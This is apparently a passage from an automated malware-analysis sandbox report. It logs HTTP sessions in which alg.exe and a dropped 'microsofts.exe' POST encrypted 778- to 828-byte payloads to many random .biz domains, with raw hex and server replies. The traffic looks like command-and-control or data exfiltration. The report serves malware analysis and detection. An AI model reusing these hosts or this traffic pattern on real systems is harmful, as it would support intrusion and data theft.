                                                                                                                                                                                                                                                                                                                                                                                                              22192.168.2.55949147.129.31.212801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:16.243174076 CET348OUTPOST /kqmqy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:16.243174076 CET778OUTData Raw: 7e d5 9a 1f 80 40 4a 82 fe 02 00 00 45 b8 87 61 31 97 cd f1 0d 89 70 59 86 f9 a4 50 a6 7f ba 55 f6 9e 5a 53 5a 55 84 7f 7b 1d 0e 49 21 fd 1e f8 c3 42 0a 1c f5 ca fd 83 82 54 2e 0a 66 b6 e4 0e 78 2f 6d 30 23 1b df ed b1 51 32 93 dd 23 53 22 dc de
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~@JEa1pYPUZSZU{I!BT.fx/m0#Q2#S"YQ~;BZ=i*]:)6.|P%6_/80l1CZx[\ A&MN:=Lc::iCflo*uZ0y]2KTQ84;{r:Cz+L#
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.692315102 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0f381188fc0538128daa34636122aad2|173.254.250.76|1730822597|1730822597|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              23192.168.2.55949813.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.886892080 CET343OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.886946917 CET778OUTData Raw: b5 36 51 98 ae 97 8e 01 fe 02 00 00 6d 69 f7 68 3b cf ee 20 20 73 78 42 56 3b ea 6c 6c e9 30 6e 84 b1 7a 7e f9 8b 61 9a 7c 64 6c 08 4a 38 c8 38 3e 9a dc d6 e5 27 ee 1e 50 00 fb 2e 3c f2 5a 8d 67 2f ba 46 19 d0 97 ad 83 08 05 d3 c1 d6 12 78 6b 79
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6Qmih; sxBV;ll0nz~a|dlJ88>'P.<Zg/FxkyD.(W^j@_-s+Ar.s^6;\.mnH2>|_oe?^VQ*Ko_&9cZ#Up<(G9/V=[Z1PX_A~cyN}=m3-5D1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.334955931 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=653760291abbfe43c00749b10901d6aa|173.254.250.76|1730822599|1730822599|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              24192.168.2.55950844.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.708985090 CET354OUTPOST /rkqsyeybt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.709032059 CET778OUTData Raw: 52 f5 07 91 a0 a0 88 c9 fe 02 00 00 cc 51 87 83 44 c8 9b 1f d4 48 4c ee 89 db 7b 5c b6 c0 1f 04 02 a6 4c 87 a7 11 f9 24 15 97 c7 6e 80 ae 2d 76 11 f5 e2 20 1f 2b 04 65 1b 7e 81 b1 ad 18 8e bf 01 71 24 92 40 27 ab e9 1f e4 e2 ea a5 45 68 db 88 53
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RQDHL{\L$n-v +e~q$@'EhSwQa7_fQuu0m,i+S'b%y>s^S<3@grEF#+OR-K>vL@4/$&fG'G,>7_Ur


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              25192.168.2.55950944.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.078854084 CET352OUTPOST /wpydads HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.078890085 CET778OUTData Raw: 66 18 9d 6e 4d 66 ea 23 fe 02 00 00 40 58 f7 0b dd 3e 58 87 8c 5c 03 f2 5b fd 5f 68 87 41 f9 96 e2 44 0a 0e 5a e8 0d e0 42 b5 1b 23 a4 71 c2 66 f9 50 8c df 41 07 d5 6b aa d8 73 50 72 37 95 e0 f3 92 9a 83 7a e2 fc 8f bb 1c 21 6f 8b be 3c d5 b4 c1
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: fnMf#@X>X\[_hADZB#qfPAksPr7z!o<twC,Co+TwK]L46KxOMe8qE^5$aLe%Od*3(/=aNB6sllp1s)%J[i
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.982525110 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a64d2167c3e0421ae975d145165ec3a4|173.254.250.76|1730822600|1730822600|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              26192.168.2.55951618.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197280884 CET353OUTPOST /aymirwrcjb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197313070 CET778OUTData Raw: 08 b9 db 4a 2b ed a6 ed fe 02 00 00 48 30 c2 0d ac 48 9c 9e 55 69 70 9d b9 72 23 06 5a 59 ec 45 41 3a 62 81 a9 b5 08 2e 42 8b 21 8d fa 16 ff 3e 2d 8b c9 ad b6 df 77 59 05 40 b5 8f 1f 78 8a 5b 53 d9 0f 27 bc ec 78 99 82 f1 f8 ce f8 28 d5 fe fd 20
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: J+H0HUipr#ZYEA:b.B!>-wY@x[S'x( rq1}d ZHTMBiUwT}J|]~yb\ev3X?9* #$!3WSs5N+e,@Iv0vTA;wPu+AM
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.628385067 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=178ae12b9d8ca06fce84d19897262dae|173.254.250.76|1730822602|1730822602|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              27192.168.2.559527172.234.222.138801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941175938 CET346OUTPOST /qntnr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941194057 CET778OUTData Raw: be 30 6f 62 2b d8 e6 eb fe 02 00 00 64 00 0c 2a f9 0a 2d 46 5c ce 26 00 59 86 90 6f d8 94 88 42 e7 8b d2 87 15 4a 67 b5 63 83 06 fc 40 d2 59 b6 77 96 c6 6d ec be 99 f3 eb 9a 96 40 01 5c a4 80 4c 9c ad 1d ee f0 f2 b5 2d a7 9b 18 7b a9 b3 e5 f4 89
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0ob+d*-F\&YoBJgc@Ywm@\L-{%H[:qn^px>gHx5N%uE#]MRUw#TB5/CpJs!b7EY"^?vlLIATW_C=J|


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              28192.168.2.559534172.234.222.138801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415813923 CET354OUTPOST /vfgrjxuhtsfio HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415838957 CET778OUTData Raw: 7c a9 15 a7 60 1a b1 4c fe 02 00 00 c9 eb 52 32 be 9a be 8d db 4b 6d 25 86 7f e4 54 9c 8f 11 1c 5e f3 57 a4 36 0e 0f a9 4a 36 07 e1 ac 7a cb dd a8 71 aa 2e 36 77 6e 09 95 ce 9c a7 78 74 79 99 8c 3f 12 51 0e a6 1d 49 2c b2 90 42 5b 48 9b fe 22 93
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: |`LR2Km%T^W6J6zq.6wnxty?QI,B[H"A\dvvS%%3l,N_X8>R$5Ju~@4Gzhx5nPH7B64PkU#j=2O[#Qkf


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              29192.168.2.55953582.112.184.197801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441998959 CET351OUTPOST /agsuui HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.442027092 CET828OUTData Raw: 45 8f b4 ad 35 2e c4 f5 30 03 00 00 ce 4e eb 78 64 0b 68 f8 41 d6 9d 1a 7e 7c 05 a8 06 29 db f2 38 40 af 5f 80 0b a9 39 72 53 b1 6a b5 c0 3b 2e 24 af 0b a9 6a 41 4d 6a 4f 97 ad 8e 87 2c ad 0a 0b 5e f2 27 c7 63 bd 85 db 92 02 64 16 68 d2 d7 e6 36
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: E5.0NxdhA~|)8@_9rSj;.$jAMjO,^'cdh6r]xrS7z{O5\xi*Sb!d%&K5jI5>@{|VL0~%QEDO0(*)EuHP,CF8)yGWrq[vT5A"`kyN


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              30192.168.2.55953834.246.200.160801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292009115 CET346OUTPOST /icvb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292026997 CET778OUTData Raw: 20 7a 58 ee cc c7 c6 e4 fe 02 00 00 27 1f 7c e3 95 8a 2f 7d 32 96 fa b3 00 66 c8 b7 f3 71 1a a9 98 56 4c fa b3 2f 1e 8c de cb f2 fc ed bd b4 e9 c1 91 df ed f3 9f 56 1a 56 04 d6 e5 72 e4 3f 6a 90 c7 63 25 a5 a3 b6 90 98 7d 24 3c e4 63 d0 f5 08 0b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: zX'|/}2fqVL/VVr?jc%}$<cimgb5`VYIHd_/BZSO."[LI85[hgn$o$PM1)|?U'Hz=oM@90hFt@pPu
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.266257048 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3a23e20d6ffb7036875369f45e6c2b57|173.254.250.76|1730822606|1730822606|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              31192.168.2.55955018.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET356OUTPOST /mjdasdrrrpdajiq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET778OUTData Raw: a6 c0 b1 52 83 62 64 b2 fe 02 00 00 61 15 e4 4d bc b1 e4 57 5b 9a e8 b9 b0 95 3f 9b 3e b5 67 02 b0 7c 24 4a eb 8d bb c4 c6 65 7c 7f 45 91 e4 56 21 14 72 08 44 cc ee 06 82 45 f1 c0 27 f4 df 64 b8 aa 49 e5 13 43 a3 44 7e bb 3e 26 02 cd fe 0a b9 c9
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RbdaMW[?>g|$Je|EV!rDE'dICD~>&mP@KKaf*(P ;m:)sV!"ud(uMeR$fZrB ^B;/AC^&Mx$:"$W{{Tzfp)3RKj$
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.263700962 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=addf63e9794fd0ee73bb7ad23e46cbda|173.254.250.76|1730822607|1730822607|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              32192.168.2.559556208.100.26.245801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930447102 CET349OUTPOST /cpggj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930470943 CET778OUTData Raw: ce 5f dc c4 20 3f f9 75 fe 02 00 00 ab 34 6f 84 32 c9 4e a8 0b 11 34 f7 f5 57 7e 61 47 0c 04 30 aa 09 9e 34 84 ef c5 f0 60 00 99 34 5e 92 3f 5e e5 f5 cf aa 14 66 8a 25 84 49 92 ca 4b 36 ba 17 cd 96 8e c5 5e af 57 9d ab 6a af eb cb a0 73 cb 35 72
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: _ ?u4o2N4W~aG04`4^?^f%IK6^Wjs5rwrk&g)pY5oHd\tr!*z0i.p]l}9UmFH6IS{Ecd>5[(b$7M*`^D6H.^tJ<*2d*YM?'oIM
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.568125963 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
